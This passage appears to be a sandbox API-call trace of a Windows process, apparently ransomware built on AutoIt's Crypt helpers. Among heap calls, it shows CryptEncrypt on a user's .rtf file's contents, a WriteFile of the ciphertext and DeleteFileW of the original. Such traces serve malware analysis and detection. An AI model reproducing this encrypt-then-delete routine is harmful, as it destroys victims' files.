| out: hHeap=0x1780000) returned 1 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29e0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0080.617] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb360 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.617] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0c0 | out: hHeap=0x1780000) returned 1 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.618] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0c0 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.618] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.618] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0080.618] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.619] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.619] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0080.619] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2960 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0080.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb168 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0080.620] PeekMessageW (in: lpMsg=0x144db3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144db3c) returned 0 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.620] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.620] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb198 [0080.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0080.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0080.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb420 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.621] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0080.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0080.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e27e8 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0080.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0080.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0080.622] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3788 [0080.622] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3788 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.623] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37a0 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c80 | out: hHeap=0x1780000) returned 1 [0080.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3608 | out: hHeap=0x1780000) returned 1 [0080.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0080.623] CryptGetKeyParam (in: hKey=0x41ac640, dwParam=0x7, pbData=0x43e2b20, pdwDataLen=0x144db58, dwFlags=0x0 | out: pbData=0x43e2b20*=0x6610, pdwDataLen=0x144db58*=0x4) returned 1 [0080.623] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0080.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3608, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.624] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e088*=0x276a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e088*=0x2770) returned 1 [0080.624] CharLowerBuffW (in: lpsz="byte[10097]", cchLength=0xb | out: lpsz="byte[10097]") returned 0xb [0080.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.624] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0080.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43c3a58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0080.624] CryptEncrypt (in: hKey=0x41ac640, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49a1670*, pdwDataLen=0x144e088*=0x276a, dwBufLen=0x2770 | out: pbData=0x49a1670*, pdwDataLen=0x144e088*=0x2770) returned 1 [0080.624] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.624] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.625] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.625] WriteFile (in: hFile=0x258, lpBuffer=0x499c780*, nNumberOfBytesToWrite=0x2770, lpNumberOfBytesWritten=0x144ea8c, lpOverlapped=0x0 | out: lpBuffer=0x499c780*, lpNumberOfBytesWritten=0x144ea8c*=0x2770, lpOverlapped=0x0) returned 1 [0080.658] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0080.658] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0080.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cb0f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0080.658] CryptDestroyKey (hKey=0x41ac640) returned 1 [0080.659] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.659] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e88, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0080.659] CryptReleaseContext (hProv=0x41a4e98, dwFlags=0x0) returned 1 [0080.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.659] FreeLibrary (hLibModule=0x756e0000) returned 1 [0080.659] CloseHandle (hObject=0x298) returned 1 [0080.660] CloseHandle (hObject=0x258) returned 1 [0080.662] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf", nBufferLength=0x7fff, lpBuffer=0x143ea88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf", lpFilePart=0x0) returned 0x39 [0080.662] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\5r 2.rtf")) returned 0x20 [0080.662] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff39c120, ftCreationTime.dwHighDateTime=0x1d5e8d9, ftLastAccessTime.dwLowDateTime=0x8d8523a0, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0x8d8523a0, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5R 2.rtf", cAlternateFileName="5R2~1.RTF")) returned 0x41ac600 [0080.662] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\5R 2.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\5r 2.rtf")) returned 1 [0080.677] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff39c120, ftCreationTime.dwHighDateTime=0x1d5e8d9, ftLastAccessTime.dwLowDateTime=0x8d8523a0, ftLastAccessTime.dwHighDateTime=0x1d5ebf7, ftLastWriteTime.dwLowDateTime=0x8d8523a0, ftLastWriteTime.dwHighDateTime=0x1d5ebf7, nFileSizeHigh=0x0, nFileSizeLow=0x276a, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="5R 2.rtf", cAlternateFileName="5R2~1.RTF")) returned 0 [0080.678] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359a68 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4480 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0080.678] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0080.678] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0080.678] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0080.678] 